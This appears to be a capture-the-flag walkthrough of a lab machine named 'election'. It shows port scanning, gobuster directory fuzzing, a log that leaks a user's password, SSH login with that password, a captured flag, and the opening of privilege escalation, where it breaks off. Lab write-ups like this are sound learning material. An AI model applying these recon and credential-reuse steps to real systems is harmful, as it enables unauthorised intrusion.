Pwned Date - 27th July 2022

Enumeration

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.190.211 -w /usr/share/wordlists/dirb/common.txt -q -t 200 
/index.html           (Status: 200) [Size: 10918]
/javascript           (Status: 301) [Size: 323] [--> <http://192.168.190.211/javascript/>]
/phpmyadmin           (Status: 301) [Size: 323] [--> <http://192.168.190.211/phpmyadmin/>]
/phpinfo.php          (Status: 200) [Size: 95437]                                       
/robots.txt           (Status: 200) [Size: 30]                                          
/server-status        (Status: 403) [Size: 280]

Untitled

After some trial and 404 only /election can be visited

Untitled

A further fuzzing inside /election

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.190.211/election -w /usr/share/wordlists/dirb/common.txt -q -t 200 
/admin                (Status: 301) [Size: 327] [--> <http://192.168.190.211/election/admin/>]
/.hta                 (Status: 403) [Size: 280]                                             
/.htpasswd            (Status: 403) [Size: 280]                                             
/.htaccess            (Status: 403) [Size: 280]                                             
/data                 (Status: 301) [Size: 326] [--> <http://192.168.190.211/election/data/>] 
/index.php            (Status: 200) [Size: 7003]                                            
/js                   (Status: 301) [Size: 324] [--> <http://192.168.190.211/election/js/>]   
/languages            (Status: 301) [Size: 331] [--> <http://192.168.190.211/election/languages/>]
/lib                  (Status: 301) [Size: 325] [--> <http://192.168.190.211/election/lib/>]      
/media                (Status: 301) [Size: 327] [--> <http://192.168.190.211/election/media/>]    
/themes               (Status: 301) [Size: 328] [--> <http://192.168.190.211/election/themes/>]

A further fuzz and get some /logs inside admin

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 192.168.190.211/election/admin -w /usr/share/wordlists/dirb/common.txt -q -t 200 
/.htaccess            (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/ajax                 (Status: 301) [Size: 332] [--> <http://192.168.190.211/election/admin/ajax/>]
/.hta                 (Status: 403) [Size: 280]                                                  
/components           (Status: 301) [Size: 338] [--> <http://192.168.190.211/election/admin/components/>]
/css                  (Status: 301) [Size: 331] [--> <http://192.168.190.211/election/admin/css/>]       
/img                  (Status: 301) [Size: 331] [--> <http://192.168.190.211/election/admin/img/>]       
/inc                  (Status: 301) [Size: 331] [--> <http://192.168.190.211/election/admin/inc/>]       
/index.php            (Status: 200) [Size: 8964]                                                       
/js                   (Status: 301) [Size: 330] [--> <http://192.168.190.211/election/admin/js/>]        
/logs                 (Status: 301) [Size: 332] [--> <http://192.168.190.211/election/admin/logs/>]      
/plugins              (Status: 301) [Size: 335] [--> <http://192.168.190.211/election/admin/plugins/>]

Untitled

┌──(kali㉿kali)-[~]
└─$ cat system.log 
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).

Exploitation

Since we have user love and password P@$$w0rd@123 but we can’t login to the website, so we will try the SSH instead

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
[email protected]'s password: P@$$w0rd@123

love@election:~$ whoami
love

love@election:~$ cat local.txt
6973c5374338a1f83c3dc9561dfd2787

love@election:~$ sudo -l
[sudo] password for love: P@$$w0rd@123
Sorry, user love may not run sudo on election.

Privilege Escalation

We can see there is some SQL service running at port 3306

love@election:~$ netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:43958         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 ::1:43958               :::*                    LISTEN      -                   
tcp6       0      0 ::1:631                43958         :::*                    LISTEN      -

To search for password, we can see the /var/www/html folder as there is php so the database credentials should be in clear text form